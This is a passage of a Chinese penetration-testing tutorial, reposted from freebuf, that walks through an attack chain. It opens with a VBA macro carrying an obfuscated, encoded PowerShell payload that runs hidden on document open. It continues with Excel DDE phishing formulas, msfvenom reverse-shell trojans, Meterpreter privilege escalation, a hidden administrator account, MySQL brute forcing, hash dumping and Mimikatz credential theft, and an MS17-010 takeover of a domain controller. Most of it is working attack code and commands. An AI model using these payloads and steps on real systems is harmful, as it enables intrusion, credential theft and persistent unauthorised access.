75. Str = Str + "AMwA4AC8ARQBsAEsAUgB3ADkAeABGAEUAaABLAEQAbgAvAE4AU"
    
76. 
    
77. Str = Str + "wA3AG4AbABnADYAVwByAHgANwAzAGMAQQB7ADIAfQAyAFQAdgB"
    
78. 
    
79. Str = Str + "rAHYASwBWACcAJwArACcAJwBGAHUAdAA2AGkAeABBAEoASgB4A"
    
80. 
    
81. Str = Str + "HsAMQB9AFgAdABaAGkAewAyAH0AbgBFAG8ARAB2AFAAQwBGAFI"
    
82. 
    
83. Str = Str + "AWgBhAEYATwBGAGcAVABnAG0ATwBGAEYAWAA2AFMAeABvAHQAT"
    
84. 
    
85. Str = Str + "QBNAGMAJwAnACsAJwAnAG4ATgAvAE4ANwA3AEEAagBwAHAANQB"
    
86. 
    
87. Str = Str + "UADcAcwAzAEIARgAyACcAJwArACcAJwBSAHsAMgB9AFIAVgBHA"
    
88. 
    
89. Str = Str + "HgAYgBRADgANABDAFMAeQB7ADEAfQBhADYAQwBaADcASABlAGE"
    
90. 
    
91. Str = Str + "AZwB4AEsAMgBDAHQAYQBKAEUASwBQAEsAUABIADcASQA2AFAAU"
    
92. 
    
93. Str = Str + "wBuAFAAQwBvADIASABHAE4ARgBJAGsAYQAnACcAKwAnACcAMQB"
    
94. 
    
95. Str = Str + "0AEoASABCAFEAYwBDAG0AVgBWAGUAbQBYAG0AaAB4ADQAdQAxA"
    
96. 
    
97. Str = Str + "DEAaABSAFQAYQBKAHcAMQBuAEUAUABGAEUAWQBrAGYAQwAwAFU"
    
98. 
    
99. Str = Str + "AaABpAEcARQBmAEoAdwBGADYAdwA5AFkAaABPAEwAQgBYAE0Aa"
    
100. 
     
101. Str = Str + "gBHAGUANQB5AHYAQQAzAEgASQB1AGIAaAAvAGwASwBKAGwAWQB"
     
102. 
     
103. Str = Str + "PAE0ASQBzAE4AbgBqAHsAMgB9AE4ASABjADEAMgBPAG8AMABqA"
     
104. 
     
105. Str = Str + "E8AUwA5AFAARQAvAG4AUQAyACsAMABPAFoAcABvAGMAUAA0AGw"
     
106. 
     
107. Str = Str + "AQwBRAEEAQgBlAE0AVQBHAEQATwBWAGgAYgBtAGoAOABUAEIAV"
     
108. 
     
109. Str = Str + "QBhAEcARgBRAHAAZgBpAEEAZgBaAG0AbwBHAFUASgBUAGsASgA"
     
110. 
     
111. Str = Str + "vAHAAcQBvAGcAOQBzAGkAVwBXAE0AbQBGAE0AYQBWADUANgBiA"
     
112. 
     
113. Str = Str + "CsAWQBVAGIAcAA0AG4AVQBIADMAVQBTAFgAbAB1AFIASgBJADk"
     
114. 
     
115. Str = Str + "AUQBSAFgAOAB4AEQAUQAxADkAYwAwAG0AUgB0AFQAZgBGAEMAV"
     
116. 
     
117. Str = Str + "QAzAC8AQQBUAE8ASwBEAEMAeQBIAGcAQQA0AFAAMQBLADgAUAB"
     
118. 
     
119. Str = Str + "NAHkANQB1AEIAdgAvAGUANABiADEARABrAHUAWgBHAE8ANgAzA"
     
120. 
     
121. Str = Str + "DgASABnAHMATgBKAGoARQB7ADEAfQBrAHIAZgA1AHsAMQB9AEs"
     
122. 
     
123. Str = Str + "AZQBjAG0ARQBzADUARgBnAGYAQQB2AFQAMwBDADIAUABzAFQAc"
     
124. 
     
125. Str = Str + "AA3AGcAbAB2AEsAaQBYAG4AZwBuAGUAVQAvAGEAcQA2AGMANgB"
     
126. 
     
127. Str = Str + "ZAEwAbQAyAGwAcAB4AFcASgByAGEAagBMAGkAewAyAH0AbwA0A"
     
128. 
     
129. Str = Str + "EUAWAA0AGMAOQB0AGMARABPAFIAZQBaAC8ATAB7ADEAfQBlAHk"
     
130. 
     
131. Str = Str + "AUgBFAE4AZQAzAEkAUQBxAEkAawA5AEYAVgBlAFMAcwBtADIAS"
     
132. 
     
133. Str = Str + "wBOADQAagAwAGsAaABFACcAJwArACcAJwArAHUAQwBnADQAcQB"
     
134. 
     
135. Str = Str + "jAGIAbQBDADMAagBpAG4AMgBrAFUAaABnAFQAcQBqAHgAUwBxA"
     
136. 
     
137. Str = Str + "DAAUgBFAFAARwBrAHEAOABlAEUAdQBwAGgAcgBEAHMAUQAxAEE"
     
138. 
     
139. Str = Str + "AcQA4AGcANQBPAHAATABaAHcANgBSAFUAMgBRAGoATgBIAEUAQ"
     
140. 
     
141. Str = Str + "QA4AEIAMwBtAHcATgBXAGMAQgAwAG0AQwBNACsAJwAnACsAJwA"
     
142. 
     
143. Str = Str + "nAGsAMABNAGIAYgBaADYAYwBrAGMAaABPAFEAYQBSAFYARwBVA"
     
144. 
     
145. Str = Str + "GwAMwBvAHgAWgBLAG0AVABsAHkAeQBNAEsASABiAHsAMgB9AGs"
     
146. 
     
147. Str = Str + "AaABaAEcASgBOADMAUwBZAHMASAAyAG4ALwBMAFIAWABUAE8Ab"
     
148. 
     
149. Str = Str + "QBnAGoAZwBvAEUAcABtADUAbQBmAG8AUwB7ADIAfQBmAFQAVQB"
     
150. 
     
151. Str = Str + "HAGcAcwBqAHcAVwBNAEgANABnAG8ASQAzAEYAbwByADcAQgBCA"
     
152. 
     
153. Str = Str + "EUARQAwAEQAeQBVAG8AdQA0AFcATgA5AGEAeABNADkATwBsADk"
     
154. 
     
155. Str = Str + "AKwBFAG8ANABZAG8AaABlAFEAQgBTADQAOAAnACcAKwAnACcAU"
     
156. 
     
157. Str = Str + "QBEAGwAaABKAFkATABCAEUAdwBoAFkATwBqAGgANgBZAG8AUgB"
     
158. 
     
159. Str = Str + "ZAHMATABJAHgAZwBSAFgARQBBAFEAdgB1AHEAMABhAFQASQBoA"
     
160. 
     
161. Str = Str + "HgAcQBSADUAcwBpAGUAWAA4AGoASAByAHYAeQAyAG8AMQBrAHE"
     
162. 
     
163. Str = Str + "ASABIAGkAZgBBAEoATQBoADgAcwB4AE4AaQBMAFoARgBtAGMAa"
     
164. 
     
165. Str = Str + "ABMAE4AdQBFAEMAUwBsAEEAQwBjAGsASwB2AC8AKwBmAEYANgA"
     
166. 
     
167. Str = Str + "rAHEAVAB1AEYAUABqAE8ASQAyAE8AawBpAFgAWgBWAE4AKwBLA"
     
168. 
     
169. Str = Str + "EoAQQB0AHkAYwBUAGsAaABhAFEAcgBSAEgAaABBACcAJwArACc"
     
170. 
     
171. Str = Str + "AJwB1ACcAJwArACcAJwBBAEkAdwBtAFoANABHAE8ASQBuAHgAV"
     
172. 
     
173. Str = Str + "wBQAHsAMQB9AFEAWgA1AFUAdgB4AGgAdABRADAARwBHAE0AagB"
     
174. 
     
175. Str = Str + "wAEsAYQBqAEwAMABsAFoAVwA1AE8AeQBZAGMASgB2AFMARQA0A"
     
176. 
     
177. Str = Str + "E4AVgBqADkAMwByADkAdgAzAHIAUwBLAHYAYgB4AGEAZQBaAGs"
     
178. 
     
179. Str = Str + "AJwAnACsAJwAnAFMARwAyAGUAcgBWACsANgAxAFcAOQBiAEYAd"
     
180. 
     
181. Str = Str + "AAyAFYAVgBoAE4AUQB4AHgAMwBUAE8ARQAyAGIAJwAnACsAJwA"
     
182. 
     
183. Str = Str + "nAGkANwB2ADcAZQAwADEAbQBBADQARgBoAE4ARABhADkAMgBTA"
     
184. 
     
185. Str = Str + "DAAbgBKAGMAMwAnACcAKwAnACcAYQAzAGEAWgBHAHsAMQB9ADE"
     
186. 
     
187. Str = Str + "ATgBIAGUAOABLAFoANwB0ADkATgAyADYAcABHADkAMgA5ADcAN"
     
188. 
     
189. Str = Str + "wByAGoAZQB1AGUANQA1ADkANwAxAHEARAA4AHQAVQBrADYAbwA"
     
190. 
     
191. Str = Str + "xAHAAZgBMADEAVgBRAHAAOQA2AEkATwB5AE4AOQByAFoAZQBxA"
     
192. 
     
193. Str = Str + "FUAWQBPAHMAVwAzADAAeQA3AEMALwBiAFQAVABFAGYAMgB4AFE"
     
194. 
     
195. Str = Str + "ATgB2AGEASgAvAFYANwA1AEEAWgBOAFAAaAA5ADMAYQBaAG0AV"
     
196. 
     
197. Str = Str + "AB0AEQAMAA2ADQAVwBwADgANgB1ADcAewAxAH0AbABYAEMAOQB"
     
198. 
     
199. Str = Str + "QAHsAMQB9AGoAbAB2AEYAaQAxAEYAMQBxAFQAVQAwAHIAUgBZA"
     
200. 
     
201. Str = Str + "DIANwBLAGIATwByAHMAYwA2ADEAJwAnACsAJwAnADMAcABGAGU"
     
202. 
     
203. Str = Str + "AOQBqAFUAKwA4AE8ARwAzAHUALwBEADIAcABsAGYAOQBLAHEAd"
     
204. 
     
205. Str = Str + "wBSAGkAdQBzAGkAVABSACsAMgAxADMAYgBUAFAATwAxAHcAWgA"
     
206. 
     
207. Str = Str + "wAFIAQgBtAGkAaABqACsAdwBLAG0AYQB7ADIAfQB1AEIAJwAnA"
     
208. 
     
209. Str = Str + "CsAJwAnAGcAdQB3ADEAUQBRAFgAewAyAH0ARwBLAHAAYQByAGg"
     
210. 
     
211. Str = Str + "ANAB3ADcAJwAnACsAJwAnADUAMQBSAHMAUgArAEwATgByAG8Ac"
     
212. 
     
213. Str = Str + "QBpAHMAbQBXAHEAMQB7ADEAfQBMAGIAdAAzADkAcQA1AFYAUQB"
     
214. 
     
215. Str = Str + "ZAHYAMgB4AEkANAA3AEYANQBQAEkAYgBiAFQAcgBhADEAMABiA"
     
216. 
     
217. Str = Str + "GwAeAB0AHQAdgBYADYAbABOAFEAYgBEAFkAWABNAHkAcwBwAGU"
     
218. 
     
219. Str = Str + "AVAAwAFMAMgB7ADEAfQBqAEkAYgBsAEMAYwBQAE8AdQByAGcAQ"
     
220. 
     
221. Str = Str + "QBHAHcAVAByAE4ALwBaAHkAWABqAFMAdgBmAEcATwB4AEsAZgB"
     
222. 
     
223. Str = Str + "0AHcAMQB2AG4AZQBmAGsAQQBDAE8AcQArADQAeABZAHYAaABOA"
     
224. 
     
225. Str = Str + "HsAMgB9ADEAYwBYAC8AdQA5AFIAOQAvAHQAagA4ADQASABtACs"
     
226. 
     
227. Str = Str + "ANQAyAFgAbQBIAGEAcwBGAGkAMAB2ADAAQwBvAHAAMABNAFMAa"
     
228. 
     
229. Str = Str + "QB0AFAASwBMAFAAZgBnAHQAagBmAHQAcABDAFoAKwAvAHAAVAB"
     
230. 
     
231. Str = Str + "7ADIAfQAvAG4AeQA0AHEAVAAwAEwAKwBuAHMAVgAzADAAUQA4A"
     
232. 
     
233. Str = Str + "FcAaQBBAEsAWgBJAEIAYQBuAHUAVgBrAGsALwBGAG0AVwBwADk"
     
234. 
     
235. Str = Str + "ANwBqAEMAUQBhAGkAcABKADAAKwBDAFgAbQBJAGEAYgBRAEYAc"
     
236. 
     
237. Str = Str + "QBGAHgAWgBsAFQAVwBLAEcAVgBPADAAaAB2ADIAaABSAHsAMgB"
     
238. 
     
239. Str = Str + "9ADYAMABxAEYAYgBKAE0AMQByAGEATwB7ADIAfQA5AGUAdQB0A"
     
240. 
     
241. Str = Str + "EwAbABaADQARQAxAFcAUABUAHkASgBZAHUATAB5AGYAZwBKAEM"
     
242. 
     
243. Str = Str + "AUgBIAFgAQwA1ADAAYwBPAGkATABSAGIANgAwAE8AUwAyACcAJ"
     
244. 
     
245. Str = Str + "wArACcAJwBWAG8ATgBpAFgATgBxAFgAcQBQAGcAVQArAGYAcgB"
     
246. 
     
247. Str = Str + "FAGEAVwAyADAAVgBNAEoAVgBQAG0AJwAnACsAJwAnAHMAVQBCA"
     
248. 
     
249. Str = Str + "G0ASQBOAHAAdQBqAGMATgAxAG8AZwBuAEsAYwBwAHYAUgB3AG8"
     
250. 
     
251. Str = Str + "AZQBCAEEASgBLADAALwB0AFkAdgBRAGMAYgBIAEwAMgBFAFMAZ"
     
252. 
     
253. Str = Str + "wBLAGwANwBaAEQAewAxAH0AQwBYAGcANgBZAC8AUQA1AHsAMQB"
     
254. 
     
255. Str = Str + "9AE4AbQA5AG4AcwBoAHcAaABBADQAdwBLADgAUABOAHAAOABsA"
     
256. 
     
257. Str = Str + "GIANABNAEEAJwAnACsAJwAnAFIAcwBIAEMAQwBIADYARAAyAEo"
     
258. 
     
259. Str = Str + "ATQAzAHkAZQBmAFAATgA0AGUAMQB2ADUAVQB4AGEAbwB4AGIAd"
     
260. 
     
261. Str = Str + "wA1AC8ANABiAFoANAA1AHIALwA3AEQANwBJAFIANgBWADgAaQB"
     
262. 
     
263. Str = Str + "rADYAcgAnACcAKwAnACcAOQBaAGYATABqAHcAcgA4AEwAOABQA"
     
264. 
     
265. Str = Str + "GcAaABFAGkAQQBnAFEAdABLAEwAYwBVAEgAMQA0AEEAYgB5AE8"
     
266. 
     
267. Str = Str + "AUgBKAHMAcQB7ADIAfQBFAE8ATQB0AHAASQBHAFgAagB1AFIAV"
     
268. 
     
269. Str = Str + "gBmAEIATwBMAGsAeQA2ADgAcwAvAGIAbAAvAG0ALwBYAHAANAB"
     
270. 
     
271. Str = Str + "rAE8AagBBAHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmA"
     
272. 
     
273. Str = Str + "CcAJwA9ACcAJwAsACcAJwBkACcAJwAsACcAJwB6ACcAJwApACk"
     
274. 
     
275. Str = Str + "AKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAc"
     
276. 
     
277. Str = Str + "gBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgB"
     
278. 
     
279. Str = Str + "NAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApA"
     
280. 
     
281. Str = Str + "CkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHM"
     
282. 
     
283. Str = Str + "ALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZ"
     
284. 
     
285. Str = Str + "gBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdAB"
     
286. 
     
287. Str = Str + "hAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7A"
     
288. 
     
289. Str = Str + "CQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQ"
     
290. 
     
291. Str = Str + "AZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAb"
     
292. 
     
293. Str = Str + "gBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdAB"
     
294. 
     
295. Str = Str + "lAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjA"
     
296. 
     
297. Str = Str + "GUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA"
     
298. 
     
299. CreateObject("Wscript.Shell").Run Str
     
300. 
     
301. End Sub

复制代码

打开文件会自动运行宏代码，在本地监听后成功上线

Excel嵌入钓鱼

利用动态数据交换DDE（Dynamic Data Exchange）可从 Office 文档中执行任意程序，但该漏洞官方已于 2017 年进行了修复。利用 Object Linking and Embedding（OLE）嵌入文档对象，可在 Excel 中嵌入批处理文件，其代码如下：

START cmd.exe

在 Excel 中选择 插入》对象》选择BAT脚本》由文件创建》更改图标

点击对象可执行脚本，但是 Office 2019 存在安全机制，对脚本执行进行拦截

在 Excel 表格中输入以下代码，点击 A1 会弹出计算器

=cmd|'/c cmd.exe /c calc.exe'!'A1'

0x05 权限提升

Windows提权

MSF提权 Windows 默认存储文件夹路径为/usr/share/metasploit-framework/modules/exploits/windows/local/，可使用ls进行查看

1. ls
   
2. /usr/share/metasploit-framework/modules/exploits/windows/local/

复制代码

生成上线

使用 msfvenom 生成反弹shell木马

1. msfvenom -p windows/meterpreter/reverse_tcp
   
2. lhost=192.168.8.212 lport=12345 -f exe > ~/Desktop/exploit.exe

复制代码

使用 nc 传输木马文件

1. nc -vl 1234 > exploit.exe
   
2. ncat 192.168.8.103 1234 < exploit.exe
   
3. ```        
   
4. 
   
5. 开启本地监听
   
6. ``` bash
   
7. msf6 > use exploit/multi/handler
   
8. msf6 > set payload windows/meterpreter/reverse_tcp
   
9. msf6 > set lhost 192.168.8.212
   
10. msf6 > set lport 12345
    
11. msf6 > exploit
    
12. ```        
    
13. 利用大马上传木马至目标回收站目录`c:\recycler`上
    
14.         
    
15. 通过`cmd.exe`执行木马程序
    
16. 
    
17. 
    
18. 成功收到 meterpreter 会话，执行命令收集信息
    
19. ``` bash
    
20. getprivs //尽可能提升权限
    
21. getsystem //通过各种攻击提升至系统权限
    
22. ```        
    
23. 
    
24. 
    
25. #### MS15-058提权
    
26. 通过 MS15-058 漏洞进行提权
    
27. ``` bash
    
28. msf6 > search ms14_058 //搜索模块
    
29. msf6 > info exploit/windows/local/ms14_058_track_popup_menu

复制代码

设置会话成功提权为系统权限

1. msf6 > set session 4
   
2. msf6 > exploit
   
3. ```        
   
4. 
   
5.                
   
6. 寻找稳定进程进行迁移
   
7. ``` bash
   
8. msf6 > ps //列出进程id        
   
9. msf6 > migrate 2060 //一般注入到浏览器进程中

复制代码

添加隐藏账户并设置为管理员

1. msf6 > shell //进入终端界面
   
2. msf6 > net user mac$ admin /add && net localgroup administrators mac$ /add //增加mac$为管理员用户，在用户名后加$可以防止被net user命令看到

复制代码

远程桌面连接新建用户

1. rdesktop 192.168.8.159

复制代码

输入账号密码mac$/admin成功登录

UAC提权

如果在提权时需要绕过 UAC，可寻找 bypass 模块进行利用

1. use
   
2. exploit/windows/local/bypass_injection_winsxs
   
3. 
   
4. set target 1
   
5. 
   
6. set payload windows/x64/meterpreter/reverse_tcp
   
7. 
   
8. set lhost 192.168.118.2
   
9. 
   
10. exploit

复制代码

在活动会话中直接加载扩展，例如 PowerShell

1. load powershell

复制代码

查看 PowerShell 版本

1. powershell_execute
   
2. "$PSVersionTable.PSVersion"

复制代码

Linux提权

MSF提权 Linux 默认存储文件夹路径为/usr/share/metasploit-framework/modules/exploits/linux/local/，可使用ls进行查看

1. ls
   
2. /usr/share/metasploit-framework/modules/exploits/linux/local/

复制代码

生成上线

使用 msfvenom 生成反弹shell木马

1. msfvenom -p php/meterpreter_reverse_tcp
   
2. lhost=192.168.8.212 lport=12345 -f raw > ~/Desktop/shell.php

复制代码

使用 nc 传输木马文件

1. nc -vl 1234 > shell.php
   
2. 
   
3. ncat 192.168.8.103 1234 < shell.php

复制代码

开启本地监听

1. msf6 > use exploit/multi/handler
   
2. 
   
3. msf6 > set payload php/meterpreter/reverse_tcp
   
4. 
   
5. msf6 > set lhost 192.168.8.212
   
6. 
   
7. msf6 > set lport 12345
   
8. 
   
9. msf6 > exploit

复制代码

通过木马上传shell.php并重命名为sh.php至网站目录上

访问http://172.16.54.6/sh.php成功收到 meterpreter 会话

1. meterpreter > getuid //查看当前用户权限

复制代码

内核提权

通过木马上传漏洞利用代码exp.c至/tmp目录下

进入 Shell 提权，但提权失败

1. shell > cd /tmp
   
2. 
   
3. shell > gcc 37292.c -o exp
   
4. 
   
5. shell > chmod +x exp
   
6. 
   
7. shell > ./exp

复制代码

dirtypipe提权

使用 Linux 本地提权模块

1. meterpreter > use
   
2. exploit/linux/local/cve_2022_0847_dirtypipe
   
3. 
   
4. meterpreter > set session 4
   
5. 
   
6. meterpreter > exploit

复制代码

0x06 域内渗透

环境介绍

通过攻击机拿到域控服务器会话

生成 EXE 后门

1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.5 lport=12345 -f exe > ~/Desktop/s.exe
   
2. ```        
   
3. 
   
4. 开启本地监听
   
5. ``` bash
   
6. msf > use exploit/multi/handler
   
7. msf > set payload windows/meterpreter/reverse_tcp
   
8. msf > set lhost 192.168.56.5
   
9. msf > set lport 12345
   
10. msf > run

复制代码

执行木马成功拿到域客户机1的会话，以下是常用域内命令

1. ipconfig /all //查看当前网卡配置信息，包括所属域以及IP段
   
2. net view /domain //查看域
   
3. net view //查看当前域中的计算机
   
4. net view /domain:CORP //查看CORP域中的计算机
   
5. ping wangsong-PC //ping计算机名得到IP
   
6. net user /domain //获取所有域的用户列表
   
7. net group /domain //获取域用户组信息
   
8. net group "domain admins" /domain //获取当前域管理员信息
   
9. net time /domain //查看域时间及域服务器的名字
   
10. 
    
11. # 需要域管理权限才能执行
    
12. net user hack hack /add /domain //添加普通域用户
    
13. net group "Domain Admins" hack /add /domain //将普通域用户提升为域管理员

复制代码

主机信息收集

使用默认命令无法成功提权

1. meterpreter > getuid
   
2. meterpreter > getprivs
   
3. meterpreter > getsystem
   
4. ```        
   
5. 
   
6.                
   
7. 服务器存在双网卡，也就是有两个网段
   
8. ``` bash
   
9. meterpreter > ipconfig
   
10. meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.8.0/24
    
11. ```        
    
12. 
    
13. 使用扫描模块扫描`192.168.8.0/24`网段
    
14. ``` bash
    
15. meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.8.0/24
    
16. ```        
    
17. 
    
18. 
    
19. 查看DNS服务器地址为`192.168.8.105`，通常来说域内 DNS 服务器就是域控主机
    
20. ``` bash
    
21. meterpreter > shell
    
22. shell > ipconfig /all
    
23. ```        
    
24. 
    
25.                
    
26. 使用端口扫描模块扫描域客户机2的端口，成功发现高危端口：3306、135、445等
    
27. ``` bash
    
28. msf > route add 192.168.8.211 255.255.255.0 1
    
29. msf > use scanner/portscan/tcp
    
30. msf > set rhosts 192.168.8.159
    
31. msf > run
    
32. ```        
    
33. 
    
34.                
    
35. ### MySQL提权
    
36. 爆破 MySQL 数据库账号密码，成功拿到账号密码root/root
    
37. ``` bash
    
38. msf > use auxiliary/scanner/mysql/mysql_login
    
39. msf > set pass_file /root/Desktop/pass.txt
    
40. msf > set rhosts 192.168.8.159
    
41. msf > run
    
42. ```        
    
43.         
    
44. 配置时需要在数据库中开启外联
    
45. ``` sql
    
46. mysql > use mysql; #选择数据库）
    
47. mysql > grant all privileges on *.* to root@'%' identified by 'root'; #修改登录主机 % 为任意主机
    
48. mysql > flush privileges;  #刷新权限
    
49. ```        
    
50. 
    
51. 利用 MySQL MOF 提权模块成功拿到管理员
    
52. ``` bash
    
53. msf > use exploit/windows/mysql/mysql_mof
    
54. msf > set username root
    
55. msf > set password root
    
56. msf > set rhosts 192.168.8.159
    
57. msf > set payload windows/meterpreter/bind_tcp
    
58. ```        
    
59. 
    
60. 
    
61. ### 域内信息收集
    
62. 进入 Shell 查看域内信息
    
63. ``` bash
    
64. meterpreter > shell
    
65. shell > net view /domain
    
66. shell > net view /domain:MACCC        
    
67. shell > net group "domain admins" /domain
    
68. shell > ping WIN-1MKU53AG2HW

复制代码

获取主机用户哈希

1. meterpreter > hashdump
   
2. ```        
   
3. 
   
4.                
   
5. 加载 Mimikatz 获取主机明文
   
6. ``` bash
   
7. meterpreter > load mimikatz
   
8. meterpreter > creds_msv
   
9. meterpreter > creds_all
   
10. ```        
    
11. 
    
12. 
    
13. 成功拿到密码为`admin`
    
14. 
    
15.                
    
16. ### 上线域控
    
17. 执行 PSExec 失败
    
18. ``` bash
    
19. msf > use exploit/windows/smb/psexec
    
20. msf > set smbuser administrator
    
21. msf > set smbpass admin
    
22. msf > set rhosts 192.168.8.105
    
23. msf > set payload windows/meterpreter/bind_tcp
    
24. msf > run

复制代码

执行 MS17-010 成功上线

1. msf > use exploit/windows/smb/ms17_010_psexec
   
2. msf > set rhosts 192.168.8.105
   
3. msf > run
   
4. ```        
   
5. 
   
6. 
   
7. ### 远程桌面登录
   
8. 提高程序运行级别
   
9. ``` bash               
   
10. msf > use exploit/windows/local/ask
    
11. msf > set sessions 1
    
12. msf > run
    
13. ```        
    
14.                
    
15. 进程迁移
    
16. ``` shell
    
17. meterpreter >ps
    
18. meterpreter >migrate 2804 //explore.exe进程号

复制代码

获取域内用户哈希

1. meterpreter >run post/windows/gather/hashdump
   
2. meterpreter >hashdump
   
3. ```        
   
4. 
   
5. 
   
6. 获取域内用户密码明文
   
7. ``` bash        
   
8. meterpreter >load mimikatz
   
9. meterpreter >creds_msv
   
10. meterpreter >creds_all

复制代码

1. meterpreter >run  getgui -e //开启远控

复制代码

远程桌面开启成功

利用 rdesktop 成功登录域控

1. rdesktop -u administrator -p admin
   
2. 192.168.8.105

复制代码

该内容转载自freebuf.com，仅供学习交流，勿作他用，如有侵权请联系删除。